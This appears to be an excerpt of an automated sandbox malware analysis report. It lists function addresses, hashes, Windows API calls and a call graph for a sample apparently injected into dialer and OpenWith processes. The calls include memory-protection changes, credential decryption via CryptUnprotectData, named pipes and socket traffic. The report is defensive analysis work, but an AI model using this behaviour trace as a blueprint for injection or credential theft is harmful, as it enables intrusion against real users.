                        • Opcode Fuzzy Hash: c591d708b08f0897b8ec15a5cffd47e08d1ff9bb0ef82714b3fa6fe5c0028ade
                        • Instruction Fuzzy Hash: 8C417CB1C41348EFDB209FA5D885FAD7BB8FB09710F20411FE952972A2C7746981DB62
                        Function 00CC22CC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 00CC2311
                          • Part of subcall function 00CC2098: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 00CC20C1
                          • Part of subcall function 00CC2098: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00CC226D
                        • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 00CC2363
                        • VirtualProtect.KERNELBASE(0000002C,?,00000040,0000002C), ref: 00CC23BD
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00CC23F0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000003.2110158241.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC2000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_3_cc2000_wdeeFKntav.jbxd
                        Similarity
                        • API ID: Virtual$Alloc$Free$Protect
                        • String ID: ,
                        • API String ID: 1004437363-3772416878
                        • Opcode ID: 15a4efe748f616053fe8ffffddab00f5333e8782292edb7e0670b88d1d28ae77
                        • Instruction ID: 09cc49fb5e65558f98019264dd19f5591ddff527570cbe22dbb585023ad58d92
                        • Opcode Fuzzy Hash: 15a4efe748f616053fe8ffffddab00f5333e8782292edb7e0670b88d1d28ae77
                        • Instruction Fuzzy Hash: C741F875900709AFCB10DFA9C881F9EBBB8FF08354F14851AF969A7240D370EA54CBA4
                        Function 00CC2098 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 00CC20C1
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00CC226D
                        Memory Dump Source
                        • Source File: 00000000.00000003.2110158241.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC2000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_3_cc2000_wdeeFKntav.jbxd
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                        • Instruction ID: 868c4ea68bc6458be08ce0a326da2c23779969c7c061e6ccf22067131941b16a
                        • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                        • Instruction Fuzzy Hash: E0718B71E04249DFDB41CF98C981BEEBBF0AF09314F284099E565FB241C634AA91DF64

                        Non-executed Functions

                        Function 00CC2277 Relevance: .0, Instructions: 35COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000003.2110158241.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC2000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_3_cc2000_wdeeFKntav.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                        • Instruction ID: 61875d35c57966bba7f8bd0d80126f0b3e129b8ec39b0b668c9cc724b8b36fd6
                        • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                        • Instruction Fuzzy Hash: 13F09079A00200CFCB24CF0AC548E95B7F6FB8573076545A9E415DB321D3B0EE44DBA1

                        Executed Functions

                        Function 027202D4 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167memoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 0272031C
                          • Part of subcall function 027200A0: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 027200C9
                          • Part of subcall function 027200A0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02720275
                        • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 0272036E
                        • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 027203DD
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 027203FD
                        • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 02720424
                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0272044C
                        • FindCloseChangeNotification.KERNELBASE(?), ref: 02720467
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000003.2114114351.0000000002720000.00000040.00000001.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_3_2720000_dialer.jbxd
                        Similarity
                        • API ID: Virtual$Alloc$Free$ChangeCloseFileFindNotificationProtectView
                        • String ID: ,
                        • API String ID: 2870039258-3772416878
                        • Opcode ID: 82e5e3048abb205ecfbadfcc4accb215ed5bf30bd6965aeddf34148881449b51
                        • Instruction ID: 92fb205c863a04c0b385a2691c013a983ea9b71f6f6dd6c2f6ddf9602ac2aaea
                        • Opcode Fuzzy Hash: 82e5e3048abb205ecfbadfcc4accb215ed5bf30bd6965aeddf34148881449b51
                        • Instruction Fuzzy Hash: 27510BB5900219EFDB20DFA5C984A9EBBB9FF18354F10C42AF959A7241D770AA44CF60
                        Function 027200A0 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 027200C9
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02720275
                        Memory Dump Source
                        • Source File: 00000002.00000003.2114114351.0000000002720000.00000040.00000001.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_3_2720000_dialer.jbxd
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                        • Instruction ID: 639df81952aaa51664d81891f360d90d93260b0d6c343cc692efe07cf0d2ec36
                        • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                        • Instruction Fuzzy Hash: 0B718971E0425ADFDB41CF98C981BEEBBF0AB19314F284096E465FB241C334AA95CF64

                        Execution Graph

                        Execution Coverage:4.3%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:21.7%
                        Total number of Nodes:429
                        Total number of Limit Nodes:43
                        execution_graph 37624 7df41f044184 37625 7df41f044189 37624->37625 37627 7df41f0441bd 37624->37627 37628 7df41f04b5d8 37625->37628 37639 7df41f0c8a44 37628->37639 37632 7df41f04b5fa 37633 7df41f04b698 37632->37633 37658 7df41f04b064 37632->37658 37664 7df41f04a124 37633->37664 37636 7df41f04b707 37638 7df41f0cf446 37636->37638 37668 7df41f0cf354 ??3@YAXPEAX GetSystemInfo __swprintf_l 37636->37668 37638->37627 37640 7df41f0c8a5e __swprintf_l 37639->37640 37642 7df41f04b5e8 37639->37642 37640->37642 37643 7df41f0c8aae __swprintf_l 37640->37643 37681 7df41f0b68d0 ??3@YAXPEAX GetSystemInfo __swprintf_l 37640->37681 37651 7df41f04b2b8 37642->37651 37643->37642 37647 7df41f0c8bc1 37643->37647 37682 7df41f0c087c ??3@YAXPEAX GetSystemInfo __swprintf_l 37643->37682 37645 7df41f0c8beb 37645->37642 37670 7df41f08d6ec 37645->37670 37647->37642 37669 7df41f0c8efc ??3@YAXPEAX GetSystemInfo __swprintf_l 37647->37669 37652 7df41f04b2da 37651->37652 37686 7df41f058afc 37652->37686 37655 7df41f04b374 37656 7df41f058afc NtAcceptConnectPort 37655->37656 37657 7df41f04b388 __swprintf_l 37656->37657 37657->37632 37659 7df41f04b07c _calloc_dbg 37658->37659 37660 7df41f04b09a 37659->37660 37661 7df41f04b0c8 37659->37661 37689 7df41f059af4 _malloc_dbg 37660->37689 37661->37633 37665 7df41f04a13d 37664->37665 37666 7df41f04a181 37664->37666 37667 7df41f04a168 ??3@YAXPEAX 37665->37667 37666->37636 37667->37665 37667->37666 37668->37638 37669->37645 37671 7df41f08d6f1 37670->37671 37673 7df41f08d744 37670->37673 37672 7df41f08d71d ??3@YAXPEAX 37671->37672 37671->37673 37672->37673 37674 7df41f0b7344 37673->37674 37675 7df41f07c220 37674->37675 37676 7df41f0b735a GetSystemInfo 37675->37676 37683 7df41f098088 37676->37683 37678 7df41f0b7378 37679 7df41f098088 __swprintf_l ??3@YAXPEAX 37678->37679 37680 7df41f0b7386 37679->37680 37680->37642 37681->37643 37682->37647 37684 7df41f0c8a44 __swprintf_l 2 API calls 37683->37684 37685 7df41f09809a __swprintf_l 37684->37685 37685->37678 37687 7df41f04b362 _malloc_dbg 37686->37687 37688 7df41f058b0c NtAcceptConnectPort 37686->37688 37687->37655 37687->37657 37688->37687 37690 7df41f059b2c RtlDosPathNameToNtPathName_U 37689->37690 37691 7df41f04b0bf ??3@YAXPEAX 37689->37691 37692 7df41f059b99 NtAcceptConnectPort 37690->37692 37697 7df41f059bc7 37690->37697 37691->37661 37692->37697 37693 7df41f059c86 ??3@YAXPEAX 37693->37691 37695 7df41f059c70 37695->37693 37696 7df41f059c7c NtAcceptConnectPort 37695->37696 37696->37693 37697->37693 37697->37695 37698 7df41f058a40 37697->37698 37699 7df41f058a50 NtAcceptConnectPort 37698->37699 37700 7df41f058aa8 37698->37700 37699->37700 37700->37697 38141 7df41f054484 ??3@YAXPEAX NtAcceptConnectPort 37724 7df41f10690c 37725 7df41f10691c 37724->37725 37727 7df41f106939 37724->37727 37725->37727 37728 7df41f1068dc 37725->37728 37729 7df41f106900 37728->37729 37730 7df41f1068ea 37728->37730 37729->37725 37730->37729 37732 7df41f10db34 37730->37732 37733 7df41f10db48 37732->37733 37742 7df41f10dbb9 37732->37742 37734 7df41f10db87 37733->37734 37741 7df41f10dc92 37733->37741 37733->37742 37735 7df41f10dc88 37734->37735 37737 7df41f10db8d 37734->37737 37752 7df41f10d588 ??3@YAXPEAX 37735->37752 37738 7df41f10dc55 37737->37738 37739 7df41f10dbb0 37737->37739 37737->37742 37745 7df41f109014 37738->37745 37739->37742 37751 7df41f10d0c4 ??3@YAXPEAX __swprintf_l 37739->37751 37741->37742 37753 7df41f1083ec ??3@YAXPEAX 37741->37753 37742->37729 37746 7df41f10904d 37745->37746 37750 7df41f109088 37745->37750 37746->37750 37754 7df41f1081d4 37746->37754 37748 7df41f109082 37748->37750 37758 7df41f10f594 ??3@YAXPEAX 37748->37758 37750->37742 37751->37742 37752->37742 37753->37742 37755 7df41f1081e8 37754->37755 37757 7df41f1081fc 37754->37757 37755->37748 37757->37755 37759 7df41f10ff30 37757->37759 37758->37750 37761 7df41f10ff54 37759->37761 37762 7df41f10ffa6 37759->37762 37761->37762 37763 7df41f10f908 37761->37763 37762->37757 37764 7df41f10f937 37763->37764 37765 7df41f10f9d0 _calloc_dbg 37764->37765 37768 7df41f10f99d 37764->37768 37766 7df41f10fa01 __swprintf_l 37765->37766 37765->37768 37766->37768 37769 7df41f11c480 ??3@YAXPEAX 37766->37769 37768->37762 37769->37768 37770 7df41f041c08 37771 7df41f041c1e 37770->37771 37773 7df41f041c3a 37770->37773 37772 7df41f041c2a lstrcmpiW 37771->37772 37772->37773 37774 7df41f058c90 37775 7df41f058ca0 NtAcceptConnectPort 37774->37775 37776 7df41f058caf 37774->37776 37775->37776 38142 7df41f053c90 ??3@YAXPEAX 37838 7df41f042110 37839 7df41f04212b 37838->37839 37848 7df41f04220c 37839->37848 37849 7df41f032bd4 37839->37849 37841 7df41f042181 37842 7df41f0421e3 37841->37842 37867 7df41f042024 NtAcceptConnectPort 37841->37867 37853 7df41f041f68 37842->37853 37846 7df41f0421f3 SetErrorMode 37859 7df41f046478 37846->37859 37850 7df41f032c07 37849->37850 37851 7df41f032be1 37849->37851 37850->37841 37851->37850 37852 7df41f032be7 RtlAddFunctionTable 37851->37852 37852->37850 37854 7df41f04201a 37853->37854 37855 7df41f041f83 37853->37855 37854->37846 37854->37848 37855->37854 37856 7df41f041ff0 37855->37856 37857 7df41f041fd2 VirtualProtect 37855->37857 37858 7df41f042002 VirtualProtect 37856->37858 37857->37856 37858->37854 37868 7df41f044ee8 37859->37868 37861 7df41f04648f 37862 7df41f0465a4 37861->37862 37864 7df41f0464a4 37861->37864 37878 7df41f045bd8 37862->37878 37865 7df41f0464b6 __swprintf_l 37864->37865 37904 7df41f056848 26 API calls 37864->37904 37865->37848 37867->37842 37869 7df41f044f01 37868->37869 37870 7df41f044f77 37869->37870 37871 7df41f044f39 VirtualProtect 37869->37871 37873 7df41f044fbe 37870->37873 37874 7df41f044f7c VirtualProtect 37870->37874 37905 7df41f031000 37871->37905 37873->37861 37876 7df41f031000 __swprintf_l 37874->37876 37875 7df41f044f61 VirtualProtect 37875->37870 37877 7df41f044fa8 VirtualProtect 37876->37877 37877->37873 37879 7df41f045c1d 37878->37879 37903 7df41f04625c __swprintf_l 37879->37903 37907 7df41f033564 37879->37907 37881 7df41f045fa7 37929 7df41f032124 37881->37929 37884 7df41f045e30 _calloc_dbg 37886 7df41f045d47 __swprintf_l 37884->37886 37885 7df41f045e9e ??3@YAXPEAX 37885->37886 37886->37881 37886->37884 37886->37885 37892 7df41f045ebc 37886->37892 37915 7df41f0339d4 37886->37915 37887 7df41f045fb1 37887->37903 37933 7df41f044dfc VirtualAlloc 37887->37933 37889 7df41f0339d4 4 API calls 37889->37892 37890 7df41f045f83 37925 7df41f043d38 _malloc_dbg _malloc_dbg ??3@YAXPEAX _malloc_dbg __swprintf_l 37890->37925 37892->37889 37892->37890 37893 7df41f045f9c 37926 7df41f033810 37893->37926 37894 7df41f046025 37897 7df41f04605b 37894->37897 37951 7df41f05c8b0 NtAcceptConnectPort NtAcceptConnectPort 37894->37951 37897->37903 37937 7df41f0441d8 37897->37937 37899 7df41f04619b 37945 7df41f04f98c CreateNamedPipeW BindIoCompletionCallback ConnectNamedPipe 37899->37945 37901 7df41f046215 37946 7df41f0809bc 37901->37946 37903->37865 37904->37865 37906 7df41f03100c __swprintf_l 37905->37906 37906->37875 37908 7df41f0337e9 __swprintf_l 37907->37908 37909 7df41f03359d __swprintf_l 37907->37909 37908->37886 37909->37908 37910 7df41f033739 _malloc_dbg 37909->37910 37910->37908 37911 7df41f03374e __swprintf_l 37910->37911 37912 7df41f0337e0 ??3@YAXPEAX 37911->37912 37952 7df41f033410 37911->37952 37912->37908 37914 7df41f0337dd 37914->37912 37916 7df41f0339ee 37915->37916 37917 7df41f0339fa _malloc_dbg 37916->37917 37920 7df41f033a1c __swprintf_l 37916->37920 37918 7df41f033a0f 37917->37918 37917->37920 37919 7df41f033a59 _malloc_dbg 37918->37919 37918->37920 37919->37920 37921 7df41f033a6a __swprintf_l 37919->37921 37920->37886 37922 7df41f033250 _malloc_dbg 37921->37922 37923 7df41f033aa9 ??3@YAXPEAX 37922->37923 37923->37920 37925->37893 37927 7df41f033819 ??3@YAXPEAX 37926->37927 37928 7df41f03381f 37926->37928 37927->37928 37928->37881 37930 7df41f032134 37929->37930 37931 7df41f03213d HeapCreate 37930->37931 37932 7df41f032156 37930->37932 37931->37932 37932->37887 37934 7df41f044eca __swprintf_l 37933->37934 37935 7df41f044e50 __swprintf_l 37933->37935 37934->37894 37936 7df41f044eac VirtualProtect 37935->37936 37936->37934 37938 7df41f044203 37937->37938 37939 7df41f05a540 NtAcceptConnectPort 37938->37939 37940 7df41f04422c 37939->37940 37943 7df41f04427e __swprintf_l 37940->37943 37974 7df41f05a2b0 37940->37974 37942 7df41f044364 GetVolumeInformationW 37944 7df41f04439f __swprintf_l 37942->37944 37943->37942 37943->37944 37944->37899 37945->37901 37949 7df41f0809d9 37946->37949 37947 7df41f0809e8 37947->37903 37949->37947 37978 7df41f0821bc 37949->37978 37984 7df41f082700 37949->37984 37951->37897 37953 7df41f033427 37952->37953 37957 7df41f033510 __swprintf_l 37952->37957 37954 7df41f0334da _malloc_dbg 37953->37954 37953->37957 37955 7df41f0334ed 37954->37955 37954->37957 37958 7df41f033250 37955->37958 37957->37914 37959 7df41f03327b 37958->37959 37962 7df41f0353d4 37959->37962 37961 7df41f033328 37961->37957 37963 7df41f03543e 37962->37963 37965 7df41f035434 __swprintf_l 37962->37965 37966 7df41f035394 37963->37966 37965->37961 37967 7df41f0353aa 37966->37967 37968 7df41f0353be 37967->37968 37970 7df41f035330 37967->37970 37968->37965 37971 7df41f035359 37970->37971 37972 7df41f035365 _malloc_dbg 37971->37972 37973 7df41f035383 37971->37973 37972->37973 37973->37968 37975 7df41f05a2f9 37974->37975 37976 7df41f05a303 __swprintf_l 37975->37976 37977 7df41f05a34f NtAcceptConnectPort 37975->37977 37976->37943 37977->37976 37981 7df41f08228b 37978->37981 37982 7df41f0821e9 37978->37982 37980 7df41f0822de WSARecv 37980->37981 37983 7df41f08236b 37980->37983 37981->37980 37981->37983 37982->37949 37983->37982 37988 7df41f081950 37983->37988 37985 7df41f082717 37984->37985 37986 7df41f082757 setsockopt 37985->37986 37987 7df41f08277e 37985->37987 37986->37987 37987->37949 37989 7df41f081975 37988->37989 37990 7df41f0819af WSARecv 37989->37990 37991 7df41f0819f9 37990->37991 37991->37982 38004 7df41f053474 38005 7df41f053478 setsockopt 38004->38005 38006 7df41f0534ca 38004->38006 38005->38006 38134 7df41f05c1f4 8 API calls 38008 7df41f041e78 38009 7df41f041e94 38008->38009 38010 7df41f041e99 GetProcAddressForCaller 38009->38010 38011 7df41f041ea2 38009->38011 38010->38011 38016 7df41f04ff7c 38017 7df41f04ff9e __swprintf_l 38016->38017 38019 7df41f05000f __swprintf_l 38016->38019 38018 7df41f04ffdd CryptUnprotectData 38017->38018 38017->38019 38018->38019 38027 7df41f04f1a4 38028 7df41f04f1c6 38027->38028 38031 7df41f053af8 38028->38031 38030 7df41f04f2c5 38032 7df41f053b1e 38031->38032 38033 7df41f053b8c __swprintf_l 38032->38033 38034 7df41f053b26 __swprintf_l 38032->38034 38035 7df41f053b35 __swprintf_l 38032->38035 38040 7df41f082bc8 38033->38040 38034->38030 38035->38034 38044 7df41f082c18 5 API calls __swprintf_l 38035->38044 38038 7df41f053b8a 38038->38034 38039 7df41f0538a4 3 API calls 38038->38039 38039->38034 38041 7df41f082bd2 38040->38041 38043 7df41f082bee 38040->38043 38041->38043 38045 7df41f081bac 38041->38045 38043->38038 38044->38038 38046 7df41f081bea 38045->38046 38048 7df41f081bd2 38045->38048 38046->38048 38049 7df41f082b1c ioctlsocket CreateIoCompletionPort SetFileCompletionNotificationModes socket bind 38046->38049 38048->38043 38049->38048 38157 7df41f0527a4 _malloc_dbg NtAcceptConnectPort __swprintf_l 38144 7df41f1088ac _calloc_dbg ??3@YAXPEAX __swprintf_l 38050 7df41f177001 38051 7df41f17705b 38050->38051 38054 7df41f177003 VirtualFree 38051->38054 38055 7df41f177032 38054->38055 38145 7df41f0450ac ??3@YAXPEAX ??3@YAXPEAX ??3@YAXPEAX __swprintf_l 38056 7df41f04ad94 38057 7df41f04ada5 38056->38057 38058 7df41f04adb3 38056->38058 38060 7df41f059ca0 _calloc_dbg 38057->38060 38061 7df41f059cd3 38060->38061 38065 7df41f059e23 38060->38065 38062 7df41f059d44 NtAcceptConnectPort 38061->38062 38063 7df41f059d72 38061->38063 38062->38063 38063->38065 38066 7df41f058c08 38063->38066 38065->38058 38067 7df41f058c5b 38066->38067 38068 7df41f058c1b NtAcceptConnectPort 38066->38068 38067->38065 38068->38067 38154 7df41f055114 WSARecv 38072 25b14e21cd0 38074 25b14e21cf5 38072->38074 38073 25b14e21f7d 38074->38073 38085 25b14e215ac 38074->38085 38076 25b14e21f74 FindCloseChangeNotification 38076->38073 38077 25b14e21f64 NtAcceptConnectPort 38077->38076 38078 25b14e21e16 38078->38076 38078->38077 38079 25b14e21e5f RtlAllocateHeap 38078->38079 38080 25b14e21e7d 38079->38080 38082 25b14e21ea9 38079->38082 38088 25b14e20ac8 38080->38088 38082->38082 38094 25b14e21a90 NtAcceptConnectPort 38082->38094 38087 25b14e215e0 NtAcceptConnectPort 38085->38087 38087->38078 38089 25b14e20c4b 38088->38089 38090 25b14e20ae8 38088->38090 38089->38082 38090->38089 38091 25b14e20bd1 NtAcceptConnectPort 38090->38091 38091->38089 38092 25b14e20c04 38091->38092 38092->38089 38093 25b14e20c1c NtAcceptConnectPort 38092->38093 38093->38089 38095 25b14e21c00 38094->38095 38096 25b14e21ae3 38094->38096 38095->38077 38100 25b14e2185c 38096->38100 38098 25b14e21afc 38099 25b14e21ba2 NtAcceptConnectPort RtlAddVectoredExceptionHandler 38098->38099 38099->38095 38101 25b14e21875 38100->38101 38102 25b14e2191c GetProcessMitigationPolicy 38101->38102 38103 25b14e21935 38101->38103 38102->38103 38103->38098 38104 7df41f080f94 38105 7df41f080fb7 38104->38105 38106 7df41f080fa6 38104->38106 38105->38106 38108 7df41f081f58 38105->38108 38109 7df41f081fa0 38108->38109 38110 7df41f081fdf WSASend 38109->38110 38111 7df41f08201d 38110->38111 38111->38106 38132 7df41f04299c _malloc_dbg ??3@YAXPEAX NtAcceptConnectPort _calloc_dbg NtAcceptConnectPort 38159 7df41f04af9c 8 API calls __swprintf_l 38112 7df41f05131c 38113 7df41f0513e6 _malloc_dbg 38112->38113 38114 7df41f05133c 38112->38114 38115 7df41f051359 __swprintf_l 38113->38115 38114->38113 38114->38115 38116 7df41f113310 38117 7df41f11333d 38116->38117 38118 7df41f113315 38116->38118 38118->38117 38119 7df41f113333 ??3@YAXPEAX 38118->38119 38119->38117 38147 7df41f0498c4 NtAcceptConnectPort _calloc_dbg NtAcceptConnectPort 37701 7df41f04cc44 37702 7df41f04cc6b 37701->37702 37703 7df41f04cca6 37702->37703 37705 7df41f058e20 37702->37705 37706 7df41f058e68 GetLogicalDriveStringsW 37705->37706 37707 7df41f058e80 __swprintf_l 37705->37707 37706->37707 37707->37703 37708 7df41f0499c8 37710 7df41f0499dd 37708->37710 37709 7df41f049a9d 37710->37709 37714 7df41f052e34 37710->37714 37712 7df41f049a6b 37718 7df41f0514c4 37712->37718 37715 7df41f052e69 37714->37715 37716 7df41f053045 RegOpenKeyW 37715->37716 37717 7df41f052fc2 37715->37717 37716->37717 37717->37712 37719 7df41f0514f3 37718->37719 37720 7df41f0514d7 37718->37720 37719->37709 37720->37719 37721 7df41f0514ea ??3@YAXPEAX 37720->37721 37721->37719 37722 25b14e219a0 RtlRemoveVectoredExceptionHandler 37723 25b14e219bf 37722->37723 38160 7df41f044fc8 8 API calls 38148 7df41f04c8d0 NtAcceptConnectPort NtAcceptConnectPort NtAcceptConnectPort __swprintf_l 38155 7df41f054550 _malloc_dbg ??3@YAXPEAX ??3@YAXPEAX ??3@YAXPEAX __swprintf_l 38161 7df41f04a3cd _malloc_dbg __swprintf_l 37777 7df41f041e4c 37778 7df41f041e66 37777->37778 37779 7df41f041e6b LoadLibraryA 37778->37779 37780 7df41f041e70 37778->37780 37779->37780 37781 7df41f05a6cc 37782 7df41f05a6ea 37781->37782 37783 7df41f05a77d 37782->37783 37787 7df41f05a703 37782->37787 37784 7df41f05a7f5 37783->37784 37786 7df41f05a786 37783->37786 37790 7df41f05a779 37784->37790 37791 7df41f05a600 37784->37791 37788 7df41f05a540 NtAcceptConnectPort 37786->37788 37786->37790 37787->37790 37795 7df41f05a540 37787->37795 37788->37790 37792 7df41f05a62c 37791->37792 37794 7df41f05a624 37791->37794 37793 7df41f05a68b NtAcceptConnectPort 37792->37793 37792->37794 37793->37794 37794->37790 37796 7df41f05a563 37795->37796 37798 7df41f05a55b 37795->37798 37797 7df41f05a5c4 NtAcceptConnectPort 37796->37797 37796->37798 37797->37798 37798->37790 37799 7df41f04eacc 37800 7df41f04eae3 37799->37800 37801 7df41f04eb0d 37799->37801 37811 7df41f0538a4 37800->37811 37806 7df41f04eae8 37801->37806 37807 7df41f053530 37801->37807 37804 7df41f04eb29 37815 7df41f053a44 WSARecv _calloc_dbg ??3@YAXPEAX 37804->37815 37808 7df41f053548 37807->37808 37816 7df41f108698 37808->37816 37810 7df41f0535a0 37810->37804 37812 7df41f0538b6 37811->37812 37814 7df41f0538cf 37812->37814 37823 7df41f053800 37812->37823 37814->37806 37815->37806 37817 7df41f1086c0 37816->37817 37818 7df41f1086d6 _calloc_dbg 37817->37818 37821 7df41f1086cc 37817->37821 37819 7df41f1086f0 37818->37819 37818->37821 37822 7df41f1084c4 ??3@YAXPEAX 37819->37822 37821->37810 37822->37821 37824 7df41f05381c 37823->37824 37830 7df41f053839 37824->37830 37831 7df41f106a50 37824->37831 37825 7df41f0514c4 ??3@YAXPEAX 37829 7df41f053871 37825->37829 37827 7df41f05382d 37828 7df41f0514c4 ??3@YAXPEAX 37827->37828 37828->37830 37829->37814 37830->37825 37833 7df41f106a59 37831->37833 37836 7df41f106ace 37831->37836 37832 7df41f106abf 37832->37836 37837 7df41f106990 ??3@YAXPEAX 37832->37837 37833->37832 37835 7df41f106ab5 ??3@YAXPEAX 37833->37835 37835->37832 37836->37827 37837->37836 38121 7df41f04bad0 6 API calls __swprintf_l 37992 7df41f0814b8 37993 7df41f08155d bind 37992->37993 37994 7df41f0814dc socket 37992->37994 37995 7df41f0814f4 37993->37995 37994->37995 37996 7df41f08150f 37994->37996 37996->37995 37999 7df41f0810c8 ioctlsocket 37996->37999 37998 7df41f081559 37998->37993 37998->37995 38000 7df41f081105 37999->38000 38001 7df41f08111d CreateIoCompletionPort 37999->38001 38000->37998 38002 7df41f081135 38001->38002 38002->38000 38003 7df41f08116a SetFileCompletionNotificationModes 38002->38003 38003->38000 38136 7df41f04f634 CreateNamedPipeW BindIoCompletionCallback ConnectNamedPipe ??3@YAXPEAX 38165 7df41f050834 _malloc_dbg ??3@YAXPEAX ??3@YAXPEAX GetSystemInfo __swprintf_l 38012 7df41f059f40 38013 7df41f059f64 38012->38013 38014 7df41f059f99 NtAcceptConnectPort 38013->38014 38015 7df41f059fc1 __swprintf_l 38013->38015 38014->38015 38128 7df41f04df40 ??3@YAXPEAX WSARecv ??3@YAXPEAX ??3@YAXPEAX 38156 7df41f04293c 8 API calls 38020 7df41f04f83c 38021 7df41f04f88f 38020->38021 38022 7df41f04f8bb CreateNamedPipeW 38021->38022 38023 7df41f04f903 38022->38023 38026 7df41f04f945 __swprintf_l 38022->38026 38024 7df41f04f91c BindIoCompletionCallback 38023->38024 38025 7df41f04f934 ConnectNamedPipe 38024->38025 38024->38026 38025->38026 38166 7df41f040441 GetLogicalDriveStringsW __swprintf_l 38124 7df41f043ae6 6 API calls 38130 7df41f050370 CryptUnprotectData __swprintf_l 38137 7df41f059e70 NtAcceptConnectPort 38139 7df41f053660 _malloc_dbg _calloc_dbg ??3@YAXPEAX 38168 7df41f04645c 24 API calls 38140 7df41f04ca5c NtAcceptConnectPort NtAcceptConnectPort __swprintf_l

                        Executed Functions

                        Function 00007DF41F059AF4 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 156nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPathPort$??3@NameName__malloc_dbg
                        • String ID: $0$@
                        • API String ID: 4066683456-2347541974
                        • Opcode ID: 2346e1dea013211445be7b298a3f58cd395ddeb762ee424c6c2405f2dc5af54b
                        • Instruction ID: 3b305061e58e19c5dc1f9014f45e8d81b367445f22d5454e64f79c7a9187bbac
                        • Opcode Fuzzy Hash: 2346e1dea013211445be7b298a3f58cd395ddeb762ee424c6c2405f2dc5af54b
                        • Instruction Fuzzy Hash: 62515170528B888FD764DF18D4857AA7BF0FF8A314F60452EE48FC6251DBB4A4858B93
                        Function 0000025B168230C7 Relevance: 10.9, APIs: 7, Instructions: 390memorynativeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000003.2278231695.0000025B16820000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025B16820000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_3_25b16820000_OpenWith.jbxd
                        Similarity
                        • API ID: AcceptConnectPort$AllocateBoundaryDeleteDescriptorHeap
                        • String ID:
                        • API String ID: 3472209132-0
                        • Opcode ID: 06103e6240192ff0ea4d22a768af3a34bd3b5889dbd62609acb6a2f682bb8b02
                        • Instruction ID: 81ecfaa18c40a3ba5125cbb705f5ad14c5d48ed68bc10589262311d88467c72e
                        • Opcode Fuzzy Hash: 06103e6240192ff0ea4d22a768af3a34bd3b5889dbd62609acb6a2f682bb8b02
                        • Instruction Fuzzy Hash: 58C16370218F098BDB99EF28C499B69B7E1FB98311F00852EE48EC7656DF34E845C785
                        Function 00007DF41F059CA0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 158nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
